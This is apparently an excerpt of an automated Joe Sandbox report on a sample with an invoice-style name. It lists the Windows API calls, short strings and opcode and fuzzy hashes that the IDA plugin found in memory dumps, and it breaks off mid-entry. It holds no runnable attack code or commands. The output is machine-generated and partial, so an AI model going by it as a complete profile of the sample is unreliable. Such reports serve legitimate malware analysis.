                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                      • Opcode ID: 74dda4391d8f9ed3ccbc10c67c3b095b7ad687f0d967076ff53b44dfc30fd87d
                                                                                                                                                                                                      • Instruction ID: 986c0112dff5ea32e0688fc01ade664d254e7fb72aa65afae893e1e38ea2680e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74dda4391d8f9ed3ccbc10c67c3b095b7ad687f0d967076ff53b44dfc30fd87d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631AF31501118ABDF115FA4DC49FEF3B69FF09324F100229FA19A22E0D739D821DB6A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                      • String ID: 0.0.0.0
                                                                                                                                                                                                      • API String ID: 2620052-3771769585
                                                                                                                                                                                                      • Opcode ID: d95e556309437f2d4b01627dc1c32f846f8ca4c31db75ee937686d82ca629b62
                                                                                                                                                                                                      • Instruction ID: 9ff267ec6d560c425b52b79f1213ef4c92f4d937c1e0f718be36d2864fea819c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d95e556309437f2d4b01627dc1c32f846f8ca4c31db75ee937686d82ca629b62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72112731904114AFEB146B61AC49EDE77ACEF01714F01007BF44592082EF78AE85875D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00425047
                                                                                                                                                                                                        • Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 004250E0
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00425116
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00425133
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00425189
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251A5
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 004251BC
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004251DA
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 004251F1
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042520F
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00425280
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                                                                      • Instruction ID: 90e1e9256e69eabba9ee52f5690f89fe01e33d53c5fc913f30279bab376557cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E71D771B00B26ABE7149E79DC41B6AB3A8AF14368F54426FF410D63C1E778DD408BD8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00444DF8
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(004C1708,000000FF,00000000,00000030), ref: 00444E59
                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 00444E8F
                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00444EA1
                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00444EE5
                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00444F01
                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00444F2B
                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00444F70
                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00444FB6
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FCA
                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444FEB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4176008265-0
                                                                                                                                                                                                      • Opcode ID: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
                                                                                                                                                                                                      • Instruction ID: fe9dd4acc330e0067c0764243ddef19340b974bd8c93f78c1856fcd7b282a81b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a1e69a52a26fff927a18392969245bc3bb0152db4d396db6c4dc7db864403c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A618071900289EFEB11CFA4D884EAF7BB8FB85308F14055BF541A7291D739AD49CB29
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004394FE
                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00439549
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0043955B
                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0043957B
                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 004395BE
                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004395D2
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 004395E7
                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 004395F4
                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004395FD
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0043960F
                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0043961A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                      • Opcode ID: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
                                                                                                                                                                                                      • Instruction ID: e980d16f425cbb2d7f1633ed62324256478b1fd8f64321c89d047c85fae3fde7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bed0439e2b7beaf883a6717116f74a8cb8083123d44484a5f0b235fb7ecd000e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4414F31D01219AFCB01EFA4DC849DEBB79FF08754F00846AE552A3251DB74EA85CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 0045ADF6
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0045AE01
                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0048D8FC,?), ref: 0045AE61
                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 0045AED4
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0045AF6E
                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0045AFCF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                                                                                                      • Opcode ID: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
                                                                                                                                                                                                      • Instruction ID: c20346a15e988a54f04bac49df2388cda8baec57d7b2c93a2b2cfcbf474f938e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2430af211e6283dd56d6ad4109776fc80f67fdeaeead523f8fa391f47edb8cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB61AA712082019FD710EF54C885B6BB7E8AF48705F104A1EF9859B292C738ED48CB9B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00458168
                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 004581AD
                                                                                                                                                                                                      • gethostbyname.WSOCK32(?), ref: 004581B9
                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 004581C7
                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00458237
                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0045824D
                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004582C2
                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 004582C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                      • Opcode ID: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
                                                                                                                                                                                                      • Instruction ID: 6169de0f2218d960c0ab1a07c4e34582c49a3c026cf62a9345236731c9483be2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 578c9b1b206952d302affdcfa7746bd2bdf3308ed4e33d94786b63cbb9f18845
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B5190316046009FD710AF65CC45B2ABBE4AF48315F04496EFE95A72E2DF78E849CB4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0044E396
                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0044E40C
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0044E416
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0044E483
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                                      • Opcode ID: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
                                                                                                                                                                                                      • Instruction ID: deef7bb9133456d45671f0089767791a2d6dc48f87c92770ff7c575c249a761d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01ba7ce30ddbc10fde12fee7c343b026316a3d7d4d61aa6e2f42a8b7e63d1a86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7319635A00205DFE701DFA6C885ABEBBB4FF04304F14852BE505A72D1D7789902CB59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0043B98C
                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 0043B997
                                                                                                                                                                                                      • GetParent.USER32 ref: 0043B9B3
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0043B9B6
                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0043B9BF
                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0043B9DB
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0043B9DE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 1383977212-1403004172
                                                                                                                                                                                                      • Opcode ID: dbc92e309fbd87042e98a085dc08232db74a3d0a2d77a6c6151f13f060f681ec
                                                                                                                                                                                                      • Instruction ID: a07899d160a5e18dd00fdcc05e482e6a444e85eff54bdb180093bf107e1422ec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbc92e309fbd87042e98a085dc08232db74a3d0a2d77a6c6151f13f060f681ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7621D6B4900108BFCB04ABA1DC86FFEB774EF49300F10022AF651A32E1DB785815DB68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0043BA73
                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 0043BA7E
                                                                                                                                                                                                      • GetParent.USER32 ref: 0043BA9A
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0043BA9D
                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0043BAA6
                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0043BAC2
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0043BAC5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 1383977212-1403004172
                                                                                                                                                                                                      • Opcode ID: e08d3e9b6bcea1ab537f44f4cb328cf2293eb166a4cb553efef08ac92f0f9aab
                                                                                                                                                                                                      • Instruction ID: c0e5afae8c8e13aff3e19bf3cbcad26b141080f5ba7c41a1646e7bea24d3a6bf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e08d3e9b6bcea1ab537f44f4cb328cf2293eb166a4cb553efef08ac92f0f9aab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C21C5B4E00108BFDB01AB64DC85FFEB775EF49304F10012AF551A32D1EBB959159B68
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0045B2D5
                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0045B302
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 0045B30C
                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0045B40C
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 0045B539
                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0045B56D
                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,0048D91C,?), ref: 0045B590
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 0045B5A3
                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045B623
                                                                                                                                                                                                      • VariantClear.OLEAUT32(0048D91C), ref: 0045B633
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                                                      • Opcode ID: 301dd562f504750e18c9c09a54e90c3d09a2858f6c32928bb50ba07065798680
                                                                                                                                                                                                      • Instruction ID: 3a49f2702521660ca2d56ed100b0fa379dcf273da301727b518e4a995d1f856e
